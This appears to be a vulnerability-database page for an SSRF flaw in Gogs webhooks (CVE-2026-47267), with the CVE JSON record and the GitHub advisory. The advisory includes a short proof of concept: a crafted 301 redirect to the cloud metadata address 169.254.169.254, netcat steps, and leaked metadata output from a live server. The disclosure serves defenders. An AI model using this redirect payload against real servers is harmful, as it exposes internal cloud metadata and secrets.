Vulnerability-Lookup

CVE-2026-47267 (GCVE-0-2026-47267)

Vulnerability from cvelistv5 – Published: 2026-06-24 20:09 – Updated: 2026-06-24 20:09

Title

Gogs: SSRF in webhook deliveries

Summary

Gogs is an open source self-hosted Git service. Prior to 0.14.3, the fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs. This vulnerability is fixed in 0.14.3.

Severity

8.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

3 references

URL	Tags
https://github.com/gogs/gogs/security/advisories/…	x_refsource_CONFIRM
https://github.com/gogs/gogs/pull/8263	x_refsource_MISC
https://github.com/gogs/gogs/commit/199cf4fd5bbe4…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
gogs	gogs	Affected: < 0.14.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "gogs",
          "vendor": "gogs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.14.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Gogs is an open source self-hosted Git service. Prior to 0.14.3, the fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs. This vulnerability is fixed in 0.14.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-24T20:09:02.854Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/gogs/gogs/security/advisories/GHSA-c4v7-xg93-qf8g",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/gogs/gogs/security/advisories/GHSA-c4v7-xg93-qf8g"
        },
        {
          "name": "https://github.com/gogs/gogs/pull/8263",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/pull/8263"
        },
        {
          "name": "https://github.com/gogs/gogs/commit/199cf4fd5bbe40b92f6dc8d649e241fd7a8d0018",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/gogs/gogs/commit/199cf4fd5bbe40b92f6dc8d649e241fd7a8d0018"
        }
      ],
      "source": {
        "advisory": "GHSA-c4v7-xg93-qf8g",
        "discovery": "UNKNOWN"
      },
      "title": "Gogs: SSRF in webhook deliveries"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-47267",
    "datePublished": "2026-06-24T20:09:02.854Z",
    "dateReserved": "2026-05-18T23:03:37.229Z",
    "dateUpdated": "2026-06-24T20:09:02.854Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-C4V7-XG93-QF8G

Vulnerability from github – Published: 2026-06-22 22:44 – Updated: 2026-06-22 22:44

Summary

Gogs has SSRF in webhook deliveries

Details

Summary

The fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.

This was already communicated in the initial report but it looks like there was a bit of a miscommunication.

Details

By creating a webook pointing to any URL that will return the following:

HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close

It is possible to access 169.254.169.254

PoC

Run netcat on any server
Use this server as the webhook URL
Once you get the request from the webhook (for example by testing it), copy the response above

Results from running this on try.gogs:

{"droplet_id":456901166,"hostname":"gogs-do-nyc3-01","vendor_data":"Content-Type: multipart/mixed; boundary=\"===============8645434374073493512==\"\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\"cloud-config\"\n\n#cloud-config\n\n# Enable root and password auth\ndisable_roo...{"dhcp_enabled":false,"vpc_peering_enabled":false},"dotty_status":"running","ssh_info":{"port":22}}

Impact

Server Side Request Forgery

Fix

The "simplest way" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients_and_Transports to check if the redirect is pointing to a blocked hostname

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.14.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T22:44:57Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe fix for  CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.\n\nThis was already communicated in the initial report but it looks like there was a bit of a miscommunication.\n\n### Details\n\nBy creating a webook pointing to any URL that will return the following:\n\n```\nHTTP/1.1 301 Moved Permanently\nLocation: http://169.254.169.254/metadata/v1.json\nContent-Length: 0\nConnection: close\n```\nIt is possible to access 169.254.169.254\n\n### PoC\n\n1. Run netcat on any server\n2. Use this server as the webhook URL\n3. Once you get the request from the webhook (for example by testing it), copy the response above\n\nResults from running this on try.gogs:\n\n```\n{\"droplet_id\":456901166,\"hostname\":\"gogs-do-nyc3-01\",\"vendor_data\":\"Content-Type: multipart/mixed; boundary=\\\"===============8645434374073493512==\\\"\\nMIME-Version: 1.0\\n\\n--===============8645434374073493512==\\nMIME-Version: 1.0\\nContent-Type: text/cloud-config; charset=\\\"us-ascii\\\"\\nContent-Transfer-Encoding: 7bit\\nContent-Disposition: attachment; filename=\\\"cloud-config\\\"\\n\\n#cloud-config\\n\\n# Enable root and password auth\\ndisable_roo...{\"dhcp_enabled\":false,\"vpc_peering_enabled\":false},\"dotty_status\":\"running\",\"ssh_info\":{\"port\":22}}\n```\n\n### Impact\nServer Side Request Forgery\n\n### Fix\n\nThe \"simplest way\" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients_and_Transports to check if the redirect is pointing to a blocked hostname",
  "id": "GHSA-c4v7-xg93-qf8g",
  "modified": "2026-06-22T22:44:57Z",
  "published": "2026-06-22T22:44:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-c4v7-xg93-qf8g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8263"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/199cf4fd5bbe40b92f6dc8d649e241fd7a8d0018"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Gogs has SSRF in webhook deliveries"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-47267 (GCVE-0-2026-47267)

GHSA-C4V7-XG93-QF8G

Summary

Details

PoC

Impact

Fix

Tags

Sightings

Nomenclature